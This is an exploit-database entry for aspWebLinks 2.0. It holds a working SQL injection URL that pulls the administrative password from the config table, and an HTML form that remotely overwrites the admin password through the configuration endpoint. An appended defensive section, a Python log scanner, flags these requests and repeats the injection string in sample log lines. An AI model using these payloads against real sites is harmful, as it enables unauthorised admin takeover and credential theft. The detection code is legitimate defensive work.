
aspWebLinks 2.0 - Remote SQL Injection / Admin Pass Change Exploit

🗓️ 01 Jul 2014 00:00:00 | Reported by Root | Type: seebug | 🔗 www.seebug.org

aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection

Code

<!--
# Title  :   aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
# Author :   ajann
# Dork   :   aspWebLinks 2.0

SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
-->


<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>
<form method='POST' action='links.asp?action=modifyconfigprocess'><input 
type='hidden' name='txtConfigID' value='1'><input type='hidden' 
name='txtSkinName' value='default'><table border='0' width='100%' 
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative 
Password:</b></font></td><td width='70%'><input type='text' 
name='txtAdministrativePassword' size='43' 
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days 
New:</b></font></td><td width='70%'><input type='text' 
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input 
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td 
width='30%' align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input 
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td 
width='30%' align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Category Header:</b></font></td><td width='70%'><input 
type='text' name='txtCategoryHeader' size='43' value='<b>Select A 
Category:</b>'></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Category 
Columns:</b></font></td><td width='70%'><input type='text' 
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub 
Category Header:</b></font></td><td width='70%'><input type='text' 
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick 
or ADD your link:'></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category 
Description:</b></font></td><td width='70%'><input type='radio' value='YES' 
name='txtShowCatDescription' checked >YES<input type='radio' value='NO' 
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on 
home page:</b></font></td><td width='70%'><input type='radio' value='YES' 
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO' 
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New 
items on home page:</b></font></td><td width='70%'><input type='text' 
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Show Whats Hot on home page:</b></font></td><td 
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked 
 >YES<input type='radio' value='NO' name='txtShowWhatsHot' 
 >NO</td></tr><tr><td width='30%' align='right' valign='top'><font 
face="Tahoma" size="1" color="black"><b>Require approval for link and review 
additions:</b></font></td><td width='70%'><input type='radio' value='YES' 
name='txtNeedApproval' checked >YES<input type='radio' value='NO' 
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot 
items on home page:</b></font></td><td width='70%'><input type='text' 
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input 
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats 
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font 
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td 
width='70%'><input type='text' name='txtWhatsHotHeader' size='43' 
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links 
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option 
selected value='ALPHA'>Alphabetically</option><option  value='DATE'>Date 
Added</option><option  value='HITS'>Number of 
Visits</option></select></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" 
color="black"><b></b></font></td><td width='70%'><input type='submit' 
value='Update Configuration' name='B1'></td></tr></table></form>

# milw0rm.com [2006-06-01]
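
Added example, not part of the original advisory or of aspWebLinks: a web-log check for the two requests shown above (a non-numeric `linkID` on `links.asp`, and a call to `action=modifyconfigprocess` from an unexpected address), run over constructed IIS-style log lines. The seven-field log layout, the `ADMIN_IPS` list and the assumption that `linkID` is always an integer are assumptions of this example.

```python
import re
from urllib.parse import parse_qs

# Assumption: addresses administrators legitimately connect from.
ADMIN_IPS = {"192.0.2.10"}

# Constructed sample, assumed layout:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2006-06-02 10:01:11 203.0.113.7 GET /links/links.asp action=reporterror&linkID=221 200
2006-06-02 10:02:40 198.51.100.9 GET /links/links.asp action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config 200
2006-06-02 10:03:05 198.51.100.9 POST /links/links.asp action=modifyconfigprocess 200
2006-06-02 10:04:00 203.0.113.7 GET /default.asp - 200
"""

def classify(line):
    """Return (client_ip, finding) for a suspicious log line, else None."""
    parts = line.split()
    if len(parts) != 7:
        return None
    _date, _time, ip, _method, stem, query, _status = parts
    if not stem.lower().endswith("/links.asp"):
        return None
    # parse_qs decodes %20 and '+' so the check sees what the script would see.
    params = {k.lower(): v[0]
              for k, v in parse_qs(query, keep_blank_values=True).items()}
    link_id = params.get("linkid")
    # Assumed: linkID is a numeric record id, so any other content is suspect.
    if link_id is not None and not re.fullmatch(r"[0-9]+", link_id):
        return ip, "non-numeric linkID"
    # Any request to the configuration-write action from a non-admin address.
    if params.get("action", "").lower() == "modifyconfigprocess" and ip not in ADMIN_IPS:
        return ip, "config change from non-admin address"
    return None

def scan(log_text):
    """Classify every line and keep only the findings, in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

A hit on the second rule is a reason to compare the stored administrative password and configuration against a known-good copy.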

                              
